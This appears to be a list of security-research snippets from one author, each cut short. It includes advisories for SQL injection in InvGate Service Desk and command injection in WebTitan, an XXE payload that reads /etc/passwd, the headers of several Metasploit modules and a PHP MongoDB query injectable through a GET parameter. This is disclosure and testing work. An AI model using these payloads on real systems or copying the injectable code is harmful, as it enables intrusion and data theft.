brandonprry

InvGate Service Desk v4.2.36 multiple vulnerabilities
http://www.invgate.com/en/service-desk/
http://www.invgate.com/en/service-desk/on-premise-trial/

Invgate Service Desk suffers from many SQL injections as an authenticated, but non-privileged
(end-user role) user. Most are also stacked injections, so an attacker also has the ability to
modify any of the data in the database. The payloads used to determine exploitability are in the
sqlmap payload output, but each was verified to be able to enumerate the current database,
current user, and an assortment of other things. These were tested with an ‘end-user’ user.

brandonprry

bperry@w00den-pickle:~/tools/msf_dev$ ./msfconsole 
  +-------------------------------------------------------+
  |  METASPLOIT by Rapid7                                 |
  +---------------------------+---------------------------+
  |      __________________   |                           |
  |  ==c(______(o(______(_()  | |""""""""""""|======[***  |
  |             )=\           | |  EXPLOIT   \            |
  |            // \\          | |_____________\_______    |
  |           //   \\         | |==[msf >]============\   |
  |          //     \\        | |______________________\  |

brandonprry

<?xml version="1.0" encoding="utf-8"?>!
<!DOCTYPE foo [ !
<!ELEMENT foo ANY >!
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>!
<wsdl:definitions xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/"
xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:mime="http://
schemas.xmlsoap.org/wsdl/mime/" xmlns:tns="http://www.webserviceX.NET/"
xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:s="http://www.w3.org/2001/
XMLSchema" xmlns:soap12="http://schemas.xmlsoap.org/wsdl/soap12/" xmlns:http="http://
schemas.xmlsoap.org/wsdl/http/" targetNamespace="http://www.webserviceX.NET/"

brandonprry

##
## This module requires Metasploit: http//metasploit.com/download
## Current source: https://github.com/rapid7/metasploit-framework
###

require 'msf/core'

class Metasploit4 < Msf::Auxiliary
  Rank = GoodRanking

brandonprry

<?php

$m = new MongoClient("mongodb://127.0.0.1:27017");
$m->selectDB('foo');
$collection = $m->selectCollection('test', 'phpmanual');

if ($_GET["age"] != "") {
	$js = 'function(){if(this.name == "Joe"||this.age=='.$_GET["age"].')return true;}';
	$cursor = $collection->find(array('$where' => $js));
	foreach($cursor as $doc) {

brandonprry

bperry@w00den-pickle:~/tmp/discourse$ brakeman

WARNING: --------------------------------------------------------------------------
You are running an old version of bundler, please update by running: gem install bundler

Loading scanner...
[Notice] Detected Rails 3 application
Processing application in /home/bperry/tmp/discourse
Processing gems...
Processing configuration...

brandonprry

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

brandonprry

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'json'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

brandonprry

 at Mono.CSharp.CSharpCodeCompiler.CompileFromFileBatch (System.CodeDom.Compiler.CompilerParameters options, System.String[] fileNames) [0x00135] in /private/tmp/source/bockbuild-mono-3.2.6/profiles/mono-mac-xamarin/build-root/mono-3.2.6/mcs/class/System/Microsoft.CSharp/CSharpCodeCompiler.cs:236 
  at Mono.CSharp.CSharpCodeCompiler.CompileAssemblyFromFileBatch (System.CodeDom.Compiler.CompilerParameters options, System.String[] fileNames) [0x00011] in /private/tmp/source/bockbuild-mono-3.2.6/profiles/mono-mac-xamarin/build-root/mono-3.2.6/mcs/class/System/Microsoft.CSharp/CSharpCodeCompiler.cs:135 
  at System.CodeDom.Compiler.CodeDomProvider.CompileAssemblyFromFile (System.CodeDom.Compiler.CompilerParameters options, System.String[] fileNames) [0x00014] in /private/tmp/source/bockbuild-mono-3.2.6/profiles/mono-mac-xamarin/build-root/mono-3.2.6/mcs/class/System/System.CodeDom.Compiler/CodeDomProvider.cs:111 
  at System.Web.Compilation.AssemblyBuilder.BuildAssembly (System.Web.VirtualPath virtualPath, System

brandonprry

WebTitan 4.01 (build 148) multiple vulnerabilities
http://www.webtitan.com/free-trial

WebTitan suffers from many command injection attacks, which is exacerbated by the fact that the “role-based” access is superficial only. An attacker with any credentials to the system can execute remote commands as a variety of local users. An authorized attacker can also take advantage of a directory traversal attack as the ‘www’ user and read arbitrary files. The application seems to only change what it displays to the users based on their roles, but these limited users can still successfully perform any request an “admin” can perform.

Because of these vulnerabilities, in the worst case scenario, a limited-access authorized user can eventually run commands remotely as the root user.